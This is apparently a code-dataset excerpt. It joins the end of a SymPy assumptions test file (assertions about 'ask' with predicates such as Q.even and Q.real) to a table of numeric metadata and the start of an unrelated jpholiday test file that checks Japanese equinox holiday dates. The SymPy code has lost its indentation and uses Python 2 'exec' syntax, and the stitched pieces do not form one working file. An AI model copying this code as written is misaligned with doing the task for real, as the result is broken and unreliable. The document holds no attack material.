assert ask(Q.commutative(x + 1), ~Q.commutative(x)) == False
assert ask(Q.commutative(x**2)) == True
assert ask(Q.commutative(x**2), ~Q.commutative(x)) == False
assert ask(Q.commutative(log(x))) == True
def test_complex():
x, y = symbols('x,y')
assert ask(Q.complex(x)) == None
assert ask(Q.complex(x), Q.complex(x)) == True
assert ask(Q.complex(x), Q.complex(y)) == None
assert ask(Q.complex(x), ~Q.complex(x)) == False
assert ask(Q.complex(x), Q.real(x)) == True
assert ask(Q.complex(x), ~Q.real(x)) == None
assert ask(Q.complex(x), Q.rational(x)) == True
assert ask(Q.complex(x), Q.irrational(x)) == True
assert ask(Q.complex(x), Q.positive(x)) == True
assert ask(Q.complex(x), Q.imaginary(x)) == True
# a+b
assert ask(Q.complex(x+1), Q.complex(x)) == True
assert ask(Q.complex(x+1), Q.real(x)) == True
assert ask(Q.complex(x+1), Q.rational(x)) == True
assert ask(Q.complex(x+1), Q.irrational(x)) == True
assert ask(Q.complex(x+1), Q.imaginary(x)) == True
assert ask(Q.complex(x+1), Q.integer(x)) == True
assert ask(Q.complex(x+1), Q.even(x)) == True
assert ask(Q.complex(x+1), Q.odd(x)) == True
assert ask(Q.complex(x+y), Q.complex(x) & Q.complex(y)) == True
assert ask(Q.complex(x+y), Q.real(x) & Q.imaginary(y)) == True
# a*x +b
assert ask(Q.complex(2*x+1), Q.complex(x)) == True
assert ask(Q.complex(2*x+1), Q.real(x)) == True
assert ask(Q.complex(2*x+1), Q.positive(x)) == True
assert ask(Q.complex(2*x+1), Q.rational(x)) == True
assert ask(Q.complex(2*x+1), Q.irrational(x)) == True
assert ask(Q.complex(2*x+1), Q.imaginary(x)) == True
assert ask(Q.complex(2*x+1), Q.integer(x)) == True
assert ask(Q.complex(2*x+1), Q.even(x)) == True
assert ask(Q.complex(2*x+1), Q.odd(x)) == True
# x**2
assert ask(Q.complex(x**2), Q.complex(x)) == True
assert ask(Q.complex(x**2), Q.real(x)) == True
assert ask(Q.complex(x**2), Q.positive(x)) == True
assert ask(Q.complex(x**2), Q.rational(x)) == True
assert ask(Q.complex(x**2), Q.irrational(x)) == True
assert ask(Q.complex(x**2), Q.imaginary(x)) == True
assert ask(Q.complex(x**2), Q.integer(x)) == True
assert ask(Q.complex(x**2), Q.even(x)) == True
assert ask(Q.complex(x**2), Q.odd(x)) == True
# 2**x
assert ask(Q.complex(2**x), Q.complex(x)) == True
assert ask(Q.complex(2**x), Q.real(x)) == True
assert ask(Q.complex(2**x), Q.positive(x)) == True
assert ask(Q.complex(2**x), Q.rational(x)) == True
assert ask(Q.complex(2**x), Q.irrational(x)) == True
assert ask(Q.complex(2**x), Q.imaginary(x)) == True
assert ask(Q.complex(2**x), Q.integer(x)) == True
assert ask(Q.complex(2**x), Q.even(x)) == True
assert ask(Q.complex(2**x), Q.odd(x)) == True
assert ask(Q.complex(x**y), Q.complex(x) & Q.complex(y)) == True
# trigonometric expressions
assert ask(Q.complex(sin(x))) == True
assert ask(Q.complex(sin(2*x + 1))) == True
assert ask(Q.complex(cos(x))) == True
assert ask(Q.complex(cos(2*x+1))) == True
# exponential
assert ask(Q.complex(exp(x))) == True
assert ask(Q.complex(exp(x))) == True
# Q.complexes
assert ask(Q.complex(Abs(x))) == True
assert ask(Q.complex(re(x))) == True
assert ask(Q.complex(im(x))) == True
def test_even():
x, y, z, t = symbols('x,y,z,t')
assert ask(Q.even(x)) == None
assert ask(Q.even(x), Q.integer(x)) == None
assert ask(Q.even(x), ~Q.integer(x)) == False
assert ask(Q.even(x), Q.rational(x)) == None
assert ask(Q.even(x), Q.positive(x)) == None
assert ask(Q.even(2*x)) == None
assert ask(Q.even(2*x), Q.integer(x)) == True
assert ask(Q.even(2*x), Q.even(x)) == True
assert ask(Q.even(2*x), Q.irrational(x)) == False
assert ask(Q.even(2*x), Q.odd(x)) == True
assert ask(Q.even(2*x), ~Q.integer(x)) == None
assert ask(Q.even(3*x), Q.integer(x)) == None
assert ask(Q.even(3*x), Q.even(x)) == True
assert ask(Q.even(3*x), Q.odd(x)) == False
assert ask(Q.even(x+1), Q.odd(x)) == True
assert ask(Q.even(x+1), Q.even(x)) == False
assert ask(Q.even(x+2), Q.odd(x)) == False
assert ask(Q.even(x+2), Q.even(x)) == True
assert ask(Q.even(7-x), Q.odd(x)) == True
assert ask(Q.even(7+x), Q.odd(x)) == True
assert ask(Q.even(x+y), Q.odd(x) & Q.odd(y)) == True
assert ask(Q.even(x+y), Q.odd(x) & Q.even(y)) == False
assert ask(Q.even(x+y), Q.even(x) & Q.even(y)) == True
assert ask(Q.even(2*x + 1), Q.integer(x)) == False
assert ask(Q.even(2*x*y), Q.rational(x) & Q.rational(x)) == None
assert ask(Q.even(2*x*y), Q.irrational(x) & Q.irrational(x)) == None
assert ask(Q.even(x+y+z), Q.odd(x) & Q.odd(y) & Q.even(z)) == True
assert ask(Q.even(x+y+z+t), Q.odd(x) & Q.odd(y) & Q.even(z) & Q.integer(t)) == None
assert ask(Q.even(Abs(x)), Q.even(x)) == True
assert ask(Q.even(Abs(x)), ~Q.even(x)) == None
assert ask(Q.even(re(x)), Q.even(x)) == True
assert ask(Q.even(re(x)), ~Q.even(x)) == None
assert ask(Q.even(im(x)), Q.even(x)) == True
assert ask(Q.even(im(x)), Q.real(x)) == True
def test_extended_real():
x = symbols('x')
assert ask(Q.extended_real(x), Q.positive(x)) == True
assert ask(Q.extended_real(-x), Q.positive(x)) == True
assert ask(Q.extended_real(-x), Q.negative(x)) == True
assert ask(Q.extended_real(x+S.Infinity), Q.real(x)) == True
def test_rational():
x, y = symbols('x,y')
assert ask(Q.rational(x), Q.integer(x)) == True
assert ask(Q.rational(x), Q.irrational(x)) == False
assert ask(Q.rational(x), Q.real(x)) == None
assert ask(Q.rational(x), Q.positive(x)) == None
assert ask(Q.rational(x), Q.negative(x)) == None
assert ask(Q.rational(x), Q.nonzero(x)) == None
assert ask(Q.rational(2*x), Q.rational(x)) == True
assert ask(Q.rational(2*x), Q.integer(x)) == True
assert ask(Q.rational(2*x), Q.even(x)) == True
assert ask(Q.rational(2*x), Q.odd(x)) == True
assert ask(Q.rational(2*x), Q.irrational(x)) == False
assert ask(Q.rational(x/2), Q.rational(x)) == True
assert ask(Q.rational(x/2), Q.integer(x)) == True
assert ask(Q.rational(x/2), Q.even(x)) == True
assert ask(Q.rational(x/2), Q.odd(x)) == True
assert ask(Q.rational(x/2), Q.irrational(x)) == False
assert ask(Q.rational(1/x), Q.rational(x)) == True
assert ask(Q.rational(1/x), Q.integer(x)) == True
assert ask(Q.rational(1/x), Q.even(x)) == True
assert ask(Q.rational(1/x), Q.odd(x)) == True
assert ask(Q.rational(1/x), Q.irrational(x)) == False
assert ask(Q.rational(2/x), Q.rational(x)) == True
assert ask(Q.rational(2/x), Q.integer(x)) == True
assert ask(Q.rational(2/x), Q.even(x)) == True
assert ask(Q.rational(2/x), Q.odd(x)) == True
assert ask(Q.rational(2/x), Q.irrational(x)) == False
# with multiple symbols
assert ask(Q.rational(x*y), Q.irrational(x) & Q.irrational(y)) == None
assert ask(Q.rational(y/x), Q.rational(x) & Q.rational(y)) == True
assert ask(Q.rational(y/x), Q.integer(x) & Q.rational(y)) == True
assert ask(Q.rational(y/x), Q.even(x) & Q.rational(y)) == True
assert ask(Q.rational(y/x), Q.odd(x) & Q.rational(y)) == True
assert ask(Q.rational(y/x), Q.irrational(x) & Q.rational(y)) == False
def test_imaginary():
x, y, z = symbols('x,y,z')
I = S.ImaginaryUnit
assert ask(Q.imaginary(x)) == None
assert ask(Q.imaginary(x), Q.real(x)) == False
assert ask(Q.imaginary(x), Q.prime(x)) == False
assert ask(Q.imaginary(x+1), Q.real(x)) == False
assert ask(Q.imaginary(x+1), Q.imaginary(x)) == False
assert ask(Q.imaginary(x+I), Q.real(x)) == False
assert ask(Q.imaginary(x+I), Q.imaginary(x)) == True
assert ask(Q.imaginary(x+y), Q.imaginary(x) & Q.imaginary(y)) == True
assert ask(Q.imaginary(x+y), Q.real(x) & Q.real(y)) == False
assert ask(Q.imaginary(x+y), Q.imaginary(x) & Q.real(y)) == False
assert ask(Q.imaginary(x+y), Q.complex(x) & Q.real(y)) == None
assert ask(Q.imaginary(I*x), Q.real(x)) == True
assert ask(Q.imaginary(I*x), Q.imaginary(x)) == False
assert ask(Q.imaginary(I*x), Q.complex(x)) == None
assert ask(Q.imaginary(x*y), Q.imaginary(x) & Q.real(y)) == True
assert ask(Q.imaginary(x+y+z), Q.real(x) & Q.real(y) & Q.real(z)) == False
assert ask(Q.imaginary(x+y+z), Q.real(x) & Q.real(y) & Q.imaginary(z)) == None
assert ask(Q.imaginary(x+y+z), Q.real(x) & Q.imaginary(y) & Q.imaginary(z)) == False
def test_infinitesimal():
x, y = symbols('x,y')
assert ask(Q.infinitesimal(x)) == None
assert ask(Q.infinitesimal(x), Q.infinitesimal(x)) == True
assert ask(Q.infinitesimal(2*x), Q.infinitesimal(x)) == True
assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x)) == None
assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x) & Q.infinitesimal(y)) == True
assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x) & Q.bounded(y)) == True
assert ask(Q.infinitesimal(x**2), Q.infinitesimal(x)) == True
def test_integer():
x = symbols('x')
assert ask(Q.integer(x)) == None
assert ask(Q.integer(x), Q.integer(x)) == True
assert ask(Q.integer(x), ~Q.integer(x)) == False
assert ask(Q.integer(x), ~Q.real(x)) == False
assert ask(Q.integer(x), ~Q.positive(x)) == None
assert ask(Q.integer(x), Q.even(x) | Q.odd(x)) == True
assert ask(Q.integer(2*x), Q.integer(x)) == True
assert ask(Q.integer(2*x), Q.even(x)) == True
assert ask(Q.integer(2*x), Q.prime(x)) == True
assert ask(Q.integer(2*x), Q.rational(x)) == None
assert ask(Q.integer(2*x), Q.real(x)) == None
assert ask(Q.integer(sqrt(2)*x), Q.integer(x)) == False
assert ask(Q.integer(x/2), Q.odd(x)) == False
assert ask(Q.integer(x/2), Q.even(x)) == True
assert ask(Q.integer(x/3), Q.odd(x)) == None
assert ask(Q.integer(x/3), Q.even(x)) == None
def test_negative():
x, y = symbols('x,y')
assert ask(Q.negative(x), Q.negative(x)) == True
assert ask(Q.negative(x), Q.positive(x)) == False
assert ask(Q.negative(x), ~Q.real(x)) == False
assert ask(Q.negative(x), Q.prime(x)) == False
assert ask(Q.negative(x), ~Q.prime(x)) == None
assert ask(Q.negative(-x), Q.positive(x)) == True
assert ask(Q.negative(-x), ~Q.positive(x)) == None
assert ask(Q.negative(-x), Q.negative(x)) == False
assert ask(Q.negative(-x), Q.positive(x)) == True
assert ask(Q.negative(x-1), Q.negative(x)) == True
assert ask(Q.negative(x+y)) == None
assert ask(Q.negative(x+y), Q.negative(x)) == None
assert ask(Q.negative(x+y), Q.negative(x) & Q.negative(y)) == True
assert ask(Q.negative(x**2)) == None
assert ask(Q.negative(x**2), Q.real(x)) == False
assert ask(Q.negative(x**1.4), Q.real(x)) == None
assert ask(Q.negative(x*y)) == None
assert ask(Q.negative(x*y), Q.positive(x) & Q.positive(y)) == False
assert ask(Q.negative(x*y), Q.positive(x) & Q.negative(y)) == True
assert ask(Q.negative(x*y), Q.complex(x) & Q.complex(y)) == None
assert ask(Q.negative(x**y)) == None
assert ask(Q.negative(x**y), Q.negative(x) & Q.even(y)) == False
assert ask(Q.negative(x**y), Q.negative(x) & Q.odd(y)) == True
assert ask(Q.negative(x**y), Q.positive(x) & Q.integer(y)) == False
assert ask(Q.negative(Abs(x))) == False
def test_nonzero():
x, y = symbols('x,y')
assert ask(Q.nonzero(x)) == None
assert ask(Q.nonzero(x), Q.real(x)) == None
assert ask(Q.nonzero(x), Q.positive(x)) == True
assert ask(Q.nonzero(x), Q.negative(x)) == True
assert ask(Q.nonzero(x), Q.negative(x) | Q.positive(x)) == True
assert ask(Q.nonzero(x+y)) == None
assert ask(Q.nonzero(x+y), Q.positive(x) & Q.positive(y)) == True
assert ask(Q.nonzero(x+y), Q.positive(x) & Q.negative(y)) == None
assert ask(Q.nonzero(x+y), Q.negative(x) & Q.negative(y)) == True
assert ask(Q.nonzero(2*x)) == None
assert ask(Q.nonzero(2*x), Q.positive(x)) == True
assert ask(Q.nonzero(2*x), Q.negative(x)) == True
assert ask(Q.nonzero(x*y), Q.nonzero(x)) == None
assert ask(Q.nonzero(x*y), Q.nonzero(x) & Q.nonzero(y)) == True
assert ask(Q.nonzero(Abs(x))) == None
assert ask(Q.nonzero(Abs(x)), Q.nonzero(x)) == True
def test_odd():
x, y, z, t = symbols('x,y,z,t')
assert ask(Q.odd(x)) == None
assert ask(Q.odd(x), Q.odd(x)) == True
assert ask(Q.odd(x), Q.integer(x)) == None
assert ask(Q.odd(x), ~Q.integer(x)) == False
assert ask(Q.odd(x), Q.rational(x)) == None
assert ask(Q.odd(x), Q.positive(x)) == None
assert ask(Q.odd(-x), Q.odd(x)) == True
assert ask(Q.odd(2*x)) == None
assert ask(Q.odd(2*x), Q.integer(x)) == False
assert ask(Q.odd(2*x), Q.odd(x)) == False
assert ask(Q.odd(2*x), Q.irrational(x)) == False
assert ask(Q.odd(2*x), ~Q.integer(x)) == None
assert ask(Q.odd(3*x), Q.integer(x)) == None
assert ask(Q.odd(x/3), Q.odd(x)) == None
assert ask(Q.odd(x/3), Q.even(x)) == None
assert ask(Q.odd(x+1), Q.even(x)) == True
assert ask(Q.odd(x+2), Q.even(x)) == False
assert ask(Q.odd(x+2), Q.odd(x)) == True
assert ask(Q.odd(3-x), Q.odd(x)) == False
assert ask(Q.odd(3-x), Q.even(x)) == True
assert ask(Q.odd(3+x), Q.odd(x)) == False
assert ask(Q.odd(3+x), Q.even(x)) == True
assert ask(Q.odd(x+y), Q.odd(x) & Q.odd(y)) == False
assert ask(Q.odd(x+y), Q.odd(x) & Q.even(y)) == True
assert ask(Q.odd(x-y), Q.even(x) & Q.odd(y)) == True
assert ask(Q.odd(x-y), Q.odd(x) & Q.odd(y)) == False
assert ask(Q.odd(x+y+z), Q.odd(x) & Q.odd(y) & Q.even(z)) == False
assert ask(Q.odd(x+y+z+t), Q.odd(x) & Q.odd(y) & Q.even(z) & Q.integer(t)) == None
assert ask(Q.odd(2*x + 1), Q.integer(x)) == True
assert ask(Q.odd(2*x + y), Q.integer(x) & Q.odd(y)) == True
assert ask(Q.odd(2*x + y), Q.integer(x) & Q.even(y)) == False
assert ask(Q.odd(2*x + y), Q.integer(x) & Q.integer(y)) == None
assert ask(Q.odd(x*y), Q.odd(x) & Q.even(y)) == False
assert ask(Q.odd(x*y), Q.odd(x) & Q.odd(y)) == True
assert ask(Q.odd(2*x*y), Q.rational(x) & Q.rational(x)) == None
assert ask(Q.odd(2*x*y), Q.irrational(x) & Q.irrational(x)) == None
assert ask(Q.odd(Abs(x)), Q.odd(x)) == True
def test_prime():
x, y = symbols('x,y')
assert ask(Q.prime(x), Q.prime(x)) == True
assert ask(Q.prime(x), ~Q.prime(x)) == False
assert ask(Q.prime(x), Q.integer(x)) == None
assert ask(Q.prime(x), ~Q.integer(x)) == False
assert ask(Q.prime(2*x), Q.integer(x)) == False
assert ask(Q.prime(x*y)) == None
assert ask(Q.prime(x*y), Q.prime(x)) == None
assert ask(Q.prime(x*y), Q.integer(x) & Q.integer(y)) == False
assert ask(Q.prime(x**2), Q.integer(x)) == False
assert ask(Q.prime(x**2), Q.prime(x)) == False
assert ask(Q.prime(x**y), Q.integer(x) & Q.integer(y)) == False
def test_positive():
x, y, z, w = symbols('x,y,z,w')
assert ask(Q.positive(x), Q.positive(x)) == True
assert ask(Q.positive(x), Q.negative(x)) == False
assert ask(Q.positive(x), Q.nonzero(x)) == None
assert ask(Q.positive(-x), Q.positive(x)) == False
assert ask(Q.positive(-x), Q.negative(x)) == True
assert ask(Q.positive(x+y), Q.positive(x) & Q.positive(y)) == True
assert ask(Q.positive(x+y), Q.positive(x) & Q.negative(y)) == None
assert ask(Q.positive(2*x), Q.positive(x)) == True
assumptions = Q.positive(x) & Q.negative(y) & Q.negative(z) & Q.positive(w)
assert ask(Q.positive(x*y*z)) == None
assert ask(Q.positive(x*y*z), assumptions) == True
assert ask(Q.positive(-x*y*z), assumptions) == False
assert ask(Q.positive(x**2), Q.positive(x)) == True
assert ask(Q.positive(x**2), Q.negative(x)) == True
#exponential
assert ask(Q.positive(exp(x)), Q.real(x)) == True
assert ask(Q.positive(x + exp(x)), Q.real(x)) == None
#absolute value
assert ask(Q.positive(Abs(x))) == None # Abs(0) = 0
assert ask(Q.positive(Abs(x)), Q.positive(x)) == True
@XFAIL
def test_positive_xfail():
assert ask(Q.positive(1/(1 + x**2)), Q.real(x)) == True
def test_real():
x, y = symbols('x,y')
assert ask(Q.real(x)) == None
assert ask(Q.real(x), Q.real(x)) == True
assert ask(Q.real(x), Q.nonzero(x)) == True
assert ask(Q.real(x), Q.positive(x)) == True
assert ask(Q.real(x), Q.negative(x)) == True
assert ask(Q.real(x), Q.integer(x)) == True
assert ask(Q.real(x), Q.even(x)) == True
assert ask(Q.real(x), Q.prime(x)) == True
assert ask(Q.real(x/sqrt(2)), Q.real(x)) == True
assert ask(Q.real(x/sqrt(-2)), Q.real(x)) == False
I = S.ImaginaryUnit
assert ask(Q.real(x+1), Q.real(x)) == True
assert ask(Q.real(x+I), Q.real(x)) == False
assert ask(Q.real(x+I), Q.complex(x)) == None
assert ask(Q.real(2*x), Q.real(x)) == True
assert ask(Q.real(I*x), Q.real(x)) == False
assert ask(Q.real(I*x), Q.imaginary(x)) == True
assert ask(Q.real(I*x), Q.complex(x)) == None
assert ask(Q.real(x**2), Q.real(x)) == True
assert ask(Q.real(sqrt(x)), Q.negative(x)) == False
assert ask(Q.real(x**y), Q.real(x) & Q.integer(y)) == True
assert ask(Q.real(x**y), Q.real(x) & Q.real(y)) == None
assert ask(Q.real(x**y), Q.positive(x) & Q.real(y)) == True
# trigonometric functions
assert ask(Q.real(sin(x))) == None
assert ask(Q.real(cos(x))) == None
assert ask(Q.real(sin(x)), Q.real(x)) == True
assert ask(Q.real(cos(x)), Q.real(x)) == True
# exponential function
assert ask(Q.real(exp(x))) == None
assert ask(Q.real(exp(x)), Q.real(x)) == True
assert ask(Q.real(x + exp(x)), Q.real(x)) == True
# Q.complexes
assert ask(Q.real(re(x))) == True
assert ask(Q.real(im(x))) == True
def test_algebraic():
x, y = symbols('x,y')
assert ask(Q.algebraic(x)) == None
assert ask(Q.algebraic(I)) == True
assert ask(Q.algebraic(2*I)) == True
assert ask(Q.algebraic(I/3)) == True
assert ask(Q.algebraic(sqrt(7))) == True
assert ask(Q.algebraic(2*sqrt(7))) == True
assert ask(Q.algebraic(sqrt(7)/3)) == True
assert ask(Q.algebraic(I*sqrt(3))) == True
assert ask(Q.algebraic(sqrt(1+I*sqrt(3)))) == True
assert ask(Q.algebraic((1+I*sqrt(3)**(S(17)/31)))) == True
assert ask(Q.algebraic((1+I*sqrt(3)**(S(17)/pi)))) == False
assert ask(Q.algebraic(sin(7))) == None
assert ask(Q.algebraic(sqrt(sin(7)))) == None
assert ask(Q.algebraic(sqrt(y+I*sqrt(7)))) == None
assert ask(Q.algebraic(oo)) == False
assert ask(Q.algebraic(-oo)) == False
assert ask(Q.algebraic(2.47)) == False
def test_global():
"""Test ask with global assumptions"""
x = symbols('x')
assert ask(Q.integer(x)) == None
global_assumptions.add(Q.integer(x))
assert ask(Q.integer(x)) == True
global_assumptions.clear()
assert ask(Q.integer(x)) == None
def test_custom_context():
"""Test ask with custom assumptions context"""
x = symbols('x')
assert ask(Q.integer(x)) == None
local_context = AssumptionsContext()
local_context.add(Q.integer(x))
assert ask(Q.integer(x), context = local_context) == True
assert ask(Q.integer(x)) == None
def test_functions_in_assumptions():
from sympy.logic.boolalg import Equivalent, Xor
x = symbols('x')
assert ask(Q.negative(x), Q.real(x) >> Q.positive(x)) is False
assert ask(Q.negative(x), Equivalent(Q.real(x), Q.positive(x))) is False
assert ask(Q.negative(x), Xor(Q.real(x), Q.negative(x))) is False
def test_composite_ask():
x = symbols('x')
assert ask(Q.negative(x) & Q.integer(x),
assumptions=Q.real(x) >> Q.positive(x)) is False
def test_composite_proposition():
from sympy.logic.boolalg import Equivalent, Implies
x = symbols('x')
assert ask(True) is True
assert ask(~Q.negative(x), Q.positive(x)) is True
assert ask(~Q.real(x), Q.commutative(x)) is None
assert ask(Q.negative(x) & Q.integer(x), Q.positive(x)) is False
assert ask(Q.negative(x) & Q.integer(x)) is None
assert ask(Q.real(x) | Q.integer(x), Q.positive(x)) is True
assert ask(Q.real(x) | Q.integer(x)) is None
assert ask(Q.real(x) >> Q.positive(x), Q.negative(x)) is False
assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.negative(x)) is False
assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False)) is None
assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.even(x)) is True
assert ask(Equivalent(Q.integer(x), Q.even(x))) is None
assert ask(Equivalent(Q.positive(x), Q.integer(x)), Q.integer(x)) is None
def test_incompatible_resolutors():
x = symbols('x')
class Prime2AskHandler(AskHandler):
@staticmethod
def Number(expr, assumptions):
return True
register_handler('prime', Prime2AskHandler)
raises(ValueError, 'ask(Q.prime(4))')
remove_handler('prime', Prime2AskHandler)
class InconclusiveHandler(AskHandler):
@staticmethod
def Number(expr, assumptions):
return None
register_handler('prime', InconclusiveHandler)
assert ask(Q.prime(3)) == True
def test_key_extensibility():
"""test that you can add keys to the ask system at runtime"""
x = Symbol('x')
# make sure the key is not defined
raises(AttributeError, "ask(Q.my_key(x))")
class MyAskHandler(AskHandler):
@staticmethod
def Symbol(expr, assumptions):
return True
register_handler('my_key', MyAskHandler)
assert ask(Q.my_key(x)) == True
assert ask(Q.my_key(x+1)) == None
remove_handler('my_key', MyAskHandler)
del Q.my_key
raises(AttributeError, "ask(Q.my_key(x))")
def test_type_extensibility():
"""test that new types can be added to the ask system at runtime
We create a custom type MyType, and override ask Q.prime=True with handler
MyAskHandler for this type
TODO: test incompatible resolutors
"""
from sympy.core import Basic
class MyType(Basic):
pass
class MyAskHandler(AskHandler):
@staticmethod
def MyType(expr, assumptions):
return True
a = MyType()
register_handler(Q.prime, MyAskHandler)
assert ask(Q.prime(a)) == True
def test_compute_known_facts():
ns = {}
exec 'from sympy.logic.boolalg import And, Or, Not' in globals(), ns
exec compute_known_facts() in globals(), ns
assert ns['known_facts_cnf'] == known_facts_cnf
assert ns['known_facts_dict'] == known_facts_dict
| 49.681854
| 132
| 0.580473
| 10,606
| 63,245
| 3.45182
| 0.016877
| 0.233051
| 0.257307
| 0.118929
| 0.934908
| 0.882737
| 0.842393
| 0.816799
| 0.760202
| 0.665447
| 0
| 0.004939
| 0.212412
| 63,245
| 1,272
| 133
| 49.720912
| 0.73004
| 0.004965
| 0
| 0.294384
| 0
| 0
| 0.003639
| 0
| 0
| 0
| 0
| 0.000786
| 0.860507
| 0
| null | null | 0.000906
| 0.009964
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5d19ef0a7015aa6d5a530b6b72f64787c15f7a25
| 7,457
|
py
|
Python
|
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
tests/test_basic.py
|
TukamotoRyuzo/jpholiday
|
1527533fd975513297d637198bdf468d0c7c65f1
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import datetime
import unittest
import jpholiday
import jpholiday.holiday
class TestBasic(unittest.TestCase):
# Init
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_original_holiday(self):
"""
独自の休み
"""
class TestHoliday(jpholiday.registry.OriginalHoliday):
def _is_holiday(self, date):
if date == datetime.date(2020, 2, 3) or date == datetime.date(2020, 2, 5):
return True
if date == datetime.date(2020, 2, 9):
return True
return False
def _is_holiday_name(self, date):
return '特別休暇'
# 国民の休日
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 3)), '特別休暇')
self.assertEqual(jpholiday.is_holiday(datetime.date(2020, 2, 4)), False)
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 5)), '特別休暇')
# 振替休日
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2020, 2, 9)), '特別休暇')
self.assertEqual(jpholiday.is_holiday(datetime.date(2020, 2, 10)), False)
jpholiday.registry.OriginalHoliday.unregister(TestHoliday)
def test_vernal_equinox_day(self):
"""
春分の日
"""
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2000), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2001), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2002), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2003), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2004), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2005), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2006), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2007), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2008), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2009), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2010), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2011), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2012), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2013), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2014), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2015), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2016), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2017), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2018), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2019), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2020), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2021), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2022), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2023), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2024), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2025), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2026), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2027), 21)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2028), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2029), 20)
self.assertEqual(jpholiday.holiday.VernalEquinoxDay._vernal_equinox_day(2030), 20)
def test_autumn_equinox_day(self):
"""
秋分の日
"""
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2000), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2001), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2002), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2003), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2004), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2005), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2006), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2007), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2008), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2009), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2010), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2011), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2012), 22)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2013), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2014), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2015), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2016), 22)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2017), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2018), 23)
self.assertEqual(jpholiday.holiday.AutumnEquinoxDay._autumn_equinox_day(2019), 23)
